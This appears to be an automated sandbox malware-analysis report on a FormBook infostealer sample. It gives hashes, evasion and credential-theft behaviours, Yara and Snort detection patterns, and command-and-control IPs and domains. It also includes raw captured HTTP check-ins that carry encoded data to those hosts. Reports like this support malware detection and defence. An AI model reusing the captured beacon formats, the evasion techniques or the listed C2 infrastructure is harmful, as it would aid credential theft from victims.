Edit tour

Windows Analysis Report
pismo1A 12.06.2024.exe

Overview

General Information

Sample name:	pismo1A 12.06.2024.exe
Analysis ID:	1456438
MD5:	1dc0ef58fcd118eda3e4e6db7f790655
SHA1:	eeaf577a39f32004a26863b48a551e3150e1e9c6
SHA256:	445c00e14a4a3eaf7e11d2858d4c963d8ce5c31ccbdff0fb275436357d6ce5c0
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

pismo1A 12.06.2024.exe (PID: 6460 cmdline: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe" MD5: 1DC0EF58FCD118EDA3E4E6DB7F790655)

svchost.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

IwDtIjtyhRCIk.exe (PID: 5688 cmdline: "C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

write.exe (PID: 6668 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)

IwDtIjtyhRCIk.exe (PID: 1352 cmdline: "C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2892 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13fbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13fbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13fbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4fa49:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x39288:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13fbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dad3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x74c2b6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x735af5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x74c2b6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x735af5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ccd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16512:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dad3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", CommandLine: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", ParentImage: C:\Users\user\Desktop\pismo1A 12.06.2024.exe, ParentProcessId: 6460, ParentProcessName: pismo1A 12.06.2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", ProcessId: 6340, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", CommandLine: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", ParentImage: C:\Users\user\Desktop\pismo1A 12.06.2024.exe, ParentProcessId: 6460, ParentProcessName: pismo1A 12.06.2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\pismo1A 12.06.2024.exe", ProcessId: 6340, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 103.120.80.111

Timestamp:	06/13/24-11:06:31.339003
SID:	2855465
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 123.58.214.101

Timestamp:	06/13/24-11:05:34.560017
SID:	2855465
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 176.113.70.180

Timestamp:	06/13/24-11:05:20.481791
SID:	2855465
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 35.241.34.216

Timestamp:	06/13/24-11:05:06.712005
SID:	2855465
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 64.226.69.42

Timestamp:	06/13/24-11:06:45.183947
SID:	2855465
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 162.0.213.72

Timestamp:	06/13/24-11:06:03.618855
SID:	2855465
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 123.58.214.101

Timestamp:	06/13/24-11:03:39.607365
SID:	2855465
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 217.116.0.191

Timestamp:	06/13/24-11:06:17.125610
SID:	2855465
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 15.197.204.56

Timestamp:	06/13/24-11:06:58.931593
SID:	2855465
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 34.149.87.45

Timestamp:	06/13/24-11:04:17.415823
SID:	2855465
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 102.222.124.13

Timestamp:	06/13/24-11:04:52.322406
SID:	2855465
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 85.13.162.190

Timestamp:	06/13/24-11:04:03.460664
SID:	2855465
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 116.213.43.190

Timestamp:	06/13/24-11:04:31.072978
SID:	2855465
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 103.138.88.32

Timestamp:	06/13/24-11:05:49.182845
SID:	2855465
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://zijrmf.com/register

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: pismo1A 12.06.2024.exe	ReversingLabs: Detection: 60%
Source: pismo1A 12.06.2024.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: pismo1A 12.06.2024.exe

Joe Sandbox ML: detected

Source: pismo1A 12.06.2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: write.pdbGCTL source: svchost.exe, 00000002.00000002.2305240769.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305256694.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000002.4489621674.00000000010C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: write.pdb source: svchost.exe, 00000002.00000002.2305240769.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305256694.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000004.00000002.4489621674.00000000010C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IwDtIjtyhRCIk.exe, 00000004.00000000.2231888284.000000000008E000.00000002.00000001.01000000.00000005.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4488416434.000000000008E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: pismo1A 12.06.2024.exe, 00000000.00000003.2030768890.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, pismo1A 12.06.2024.exe, 00000000.00000003.2032082942.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305485059.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219833592.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305485059.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2218454465.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000003.2306935386.0000000004AEE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000003.2305313641.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: pismo1A 12.06.2024.exe, 00000000.00000003.2030768890.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, pismo1A 12.06.2024.exe, 00000000.00000003.2032082942.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2305485059.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219833592.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2305485059.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2218454465.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, write.exe, write.exe, 00000005.00000003.2306935386.0000000004AEE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491009189.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000005.00000003.2305313641.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: write.exe, 00000005.00000002.4488869608.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491856252.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000000.2371030466.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2585008330.000000000193C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: write.exe, 00000005.00000002.4488869608.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000005.00000002.4491856252.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000000.2371030466.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2585008330.000000000193C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0070DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0070DBBE
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006DC2A2 FindFirstFileExW,	0_2_006DC2A2
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_007168EE FindFirstFileW,FindClose,	0_2_007168EE
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0071698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0071698F
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0070D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0070D076
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0070D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0070D3A9
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00719642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00719642
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_0071979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0071979D
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00719B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00719B2B
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_00715C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00715C97
Source: C:\Windows\SysWOW64\write.exe	Code function: 5_2_02B0BC30 FindFirstFileW,FindNextFileW,FindClose,	5_2_02B0BC30

Source: C:\Windows\SysWOW64\write.exe	Code function: 4x nop then xor eax, eax	5_2_02AF9760
Source: C:\Windows\SysWOW64\write.exe	Code function: 4x nop then pop edi	5_2_02B0222B
Source: C:\Windows\SysWOW64\write.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_04A60548

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49710 -> 123.58.214.101:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49715 -> 85.13.162.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49719 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49723 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49727 -> 102.222.124.13:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49731 -> 35.241.34.216:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49735 -> 176.113.70.180:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49739 -> 123.58.214.101:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49743 -> 103.138.88.32:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49747 -> 162.0.213.72:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49751 -> 217.116.0.191:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49755 -> 103.120.80.111:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49759 -> 64.226.69.42:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49763 -> 15.197.204.56:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.mg55aa.xyz

Source: Joe Sandbox View	IP Address: 102.222.124.13 102.222.124.13
Source: Joe Sandbox View	IP Address: 162.0.213.72 162.0.213.72
Source: Joe Sandbox View	IP Address: 116.213.43.190 116.213.43.190

Source: Joe Sandbox View	ASN Name: CKL1-ASNKE CKL1-ASNKE
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: CLOUDIVLIMITED-ASCloudIvLimitedHK CLOUDIVLIMITED-ASCloudIvLimitedHK
Source: Joe Sandbox View	ASN Name: ASIANETGB ASIANETGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0071CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0071CE44

Source: global traffic	HTTP traffic detected: GET /9yv1/?fD=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.am1-728585.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /jd4u/?fD=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.witoharmuth.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic	HTTP traffic detected: GET /fkxp/?fD=/8gewv/74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4/yxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ==&j0=vTcl_2X8QJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magnoliahairandco.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
